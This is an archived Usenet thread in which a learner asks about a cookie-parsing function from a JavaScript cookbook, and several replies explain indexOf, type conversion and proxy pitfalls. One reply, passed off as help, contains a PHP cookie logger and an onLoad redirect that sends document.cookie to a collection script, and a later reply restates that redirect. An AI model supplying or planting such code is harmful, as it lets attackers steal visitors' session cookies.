Cookie question

D

DoomedLung

Hey, I recently bought "The Javascript and DHTML Cookbook" by Danny
Goodman.

I'm at Chapter 1, part 1.9 "Reading and Writing Strings for Cookies"
and was just interested in a utility function that grabs a cookie
value:

function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1) {
endstr = document.cookie.length;
}
return unescape(document.cookie.substring(offset, endstr));
}

The part I don't understand is the if statement within the function,
why is it checking if endStr equals to false?

The book is kinda vague in explaining what this means! Any help would
be great.

Cheers
 
T

Tom Cole

DoomedLung said:
Hey, I recently bought "The Javascript and DHTML Cookbook" by Danny
Goodman.

I'm at Chapter 1, part 1.9 "Reading and Writing Strings for Cookies"
and was just interested in a utility function that grabs a cookie
value:

function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1) {
endstr = document.cookie.length;
}
return unescape(document.cookie.substring(offset, endstr));
}

The part I don't understand is the if statement within the function,
why is it checking if endStr equals to false?

In case cookie returned no value from the supplied offset. It may also
work if there was no cookie at all or the cookie was empty (any experts
can chime in on that one).

Javascript has this neat ability (I say neat because java doesn't have
it) where null equals false. That little nuance makes a LOT of things
easier, especially when trying to do things like detect a browser's
capabilities or the presence (or lack thereof) of a DOM node.

For example, the statement

if (e.which) {
....
}


only executes if Javascript can evaluate the e.which object. That's
very cool in my eyes.
 
D

DoomedLung

Tom said:
In case cookie returned no value from the supplied offset. It may also
work if there was no cookie at all or the cookie was empty (any experts
can chime in on that one).

Javascript has this neat ability (I say neat because java doesn't have
it) where null equals false. That little nuance makes a LOT of things
easier, especially when trying to do things like detect a browser's
capabilities or the presence (or lack thereof) of a DOM node.

For example, the statement

if (e.which) {
....
}


only executes if Javascript can evaluate the e.which object. That's
very cool in my eyes.

Hey, thanks for your speedy reply!

That makes alot of sense now

Cheers :)
 
M

mistral

DoomedLung пиÑал(а):
Hey, I recently bought "The Javascript and DHTML Cookbook" by Danny
Goodman.

I'm at Chapter 1, part 1.9 "Reading and Writing Strings for Cookies"
and was just interested in a utility function that grabs a cookie
value:

function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1) {
endstr = document.cookie.length;
}
return unescape(document.cookie.substring(offset, endstr));
}

The part I don't understand is the if statement within the function,
why is it checking if endStr equals to false?

The book is kinda vague in explaining what this means! Any help would
be great.

Cheers

Hey, thanks for your speedy reply!

That makes alot of sense now

Cheers :)
----------------------------
You may use a php script to get cookie:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt', 'a'); //chmod 777 log.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>

Save it as cookies.php and place on server, place the log.txt in same
directory. Add javascript in html page which will send cookie,
something like this
<body
onLoad="javascript:void(document.location='http://localhost/cookies.php?c='+document.cookie)">

Regards.
 
L

Laurent Bugnion

Hi,
OP asked about cookie handling, so this may be what he want.

Regards.

Oh, you didn't read his post? The OP asked a question about testing null
values.

Additionally, posting a PHP script as an answer to a client-side
JavaScript question is not really relevant...

HTH,
Laurent
 
T

Tom Cole

Laurent said:
Hi,

<snip>

How is your answer related to the OP's question, or to JavaScript for
that matter?



You should not use javascript: in event handlers.

Please pardon my thread jumping, but I was wondering about that. I
sometimes see javascript: used in eventhandlers, and sometimes not. Is
there a particular use for the javascript: prefix (when you absolutely
must use it) and why is it not considered good to use it in event
handlers?
 
E

Evertjan.

Tom Cole wrote on 15 sep 2006 in comp.lang.javascript:
Please pardon my thread jumping, but I was wondering about that. I
sometimes see javascript: used in eventhandlers, and sometimes not. Is
there a particular use for the javascript: prefix (when you absolutely
must use it) and why is it not considered good to use it in event
handlers?

javascript is the default language in the handlers.

[Unless, using IE only, you have previously specified vbscript]

What is the reason for using void() here? None methinks!


<body onLoad = "location.href =
'http://localhost/cookies.php?c='+document.cookie">
 
R

Richard Cornford

Tom said:
DoomedLung wrote:

In case cookie returned no value from the supplied offset.

The - offset - is the start value for the search for ";"
It may also work if there was no cookie at all or the
cookie was empty (any experts can chime in on that one).

It will 'work' if the cookie string is empty, it would error-out if
the - document.cookie - value was anything other than a sting primitive,
string object or an object implementing an - indexOf - method of its
own. Under normal circumstances the value not being a string primitive
would be unexpected.
Javascript has this neat ability (I say neat because java
doesn't have it) where null equals false.

It would be more reasonable to say that when a type-conversion to
boolean is applied to null it becomes boolean false. If type-converted
to a number it converts to numeric zero.
That little nuance makes a LOT of things easier,
especially when trying to do things like detect a browser's
capabilities or the presence (or lack thereof) of a DOM node.

For example, the statement

if (e.which) {

Applying a type-converting test to - e.which - (assuming - e - is
intended to be an event object and - which - the property of event
objects implemented in some, but not all, browsers) would be
inappropriate in most circumstances as the - which - property of events
is of numeric type when implement and returns underfeed (_not_ null)
when not implemented. The undefined value may type-convert to false if
the - if(e.which) - test, but so will numeric zero. Type converting
tests are good for objects and functions, where truness follows from the
existence fo the object and falseness from its absence, but properties
expected to have primitive vlaues will all type-convert to false with
some values even if implemented.
....
}


only executes if Javascript can evaluate the e.which object.
That's very cool in my eyes.
<snip>

It is something that needs to be understood in order to be properly
exploited:-

<URL: http://jibbering.com/faq/faq_notes/type_convert.html >

Richard.
 
R

Richard Cornford

DoomedLung said:
Hey, I recently bought "The Javascript and DHTML Cookbook"
by Danny Goodman.

Hard luck.
I'm at Chapter 1, part 1.9 "Reading and Writing Strings
for Cookies" and was just interested in a utility function
that grabs a cookie value:

function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1) {
endstr = document.cookie.length;
}
return unescape(document.cookie.substring(offset, endstr));
}

The part I don't understand is the if statement within the
function, why is it checking if endStr equals to false?

First -1 is not a false value. That is, if used in a context where a
boolean value is required a number type-converts to boolean as; zero and
NaN convert to boolean false, all other numbers (including -1) convert
to boolean true.

Type-converting comparison (with - == -, as opposed to - === -) does not
type-convert to boolean. It prefers to do its comparisons on numeric
value (with strings its second choice). No type-conversion is needed
above as the value of - endstr - will be numeric if the code gets to
that line at all.

The reason for the text is that the - indexOf - method of stirngs
returns the index of the argument string within the subject string as an
index. To signal that the test string could not be found it returns the
number -1.

Cookies are name/value pairs in the form - name=value -, separated with
a semicolon. Searching a string for a semicolon (from a start index)
will give the point where the name/value pair ends. However, if the next
name value pair is either the only one, or the last one, it will not be
followed by a semicolon. In that case the - indexOf - method returns -1.
As this condition occurs when the name/value pair is the last in the
cookie, the only one in the cookie or the cookie is empty, if there is a
name/value pair its end coincides with the end of the string, so the end
index is set to the length of the string.


The code above fails to take into account a characteristic of content
inserting/re-writing proxies (such as personal firewalls and Internet
security programs) with some 'privacy' setting enabled. Software of this
type may modify incoming javascript code to replace occurrences of the
character sequence 'cookie' with another character sequence. The results
is that code that attempts to interact with cookies in the browser may
find themselves re-written in such a way as to make - document.cookie -
into a reference to a value that is not a string (most likely the
undefined value). Such code will error-out if it tries -
document.cookies.indexOf - as you cannot call the - indexOf - method on
a value that is not either a string primitive or a string object.

This type of proxy software is sufficiently common (and not sufficiently
understood by its users) that it is a good idea guard against code
erroring-out when attempting to interact with cookies by verifying
that - document.cookie - does refer to a sting, using a test such as -
if('' == typeof document.cookie){ ... } - around the code that attempts
to read the cookie.
The book is kinda vague in explaining what this means!

It is not in the nature of 'cookbook' style books to be explaining what
they do. They are targeted at people who don't what to learn what they
are doing.

Richard.
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Members online

Forum statistics

Threads
473,744
Messages
2,569,483
Members
44,902
Latest member
Elena68X5

Latest Threads

Top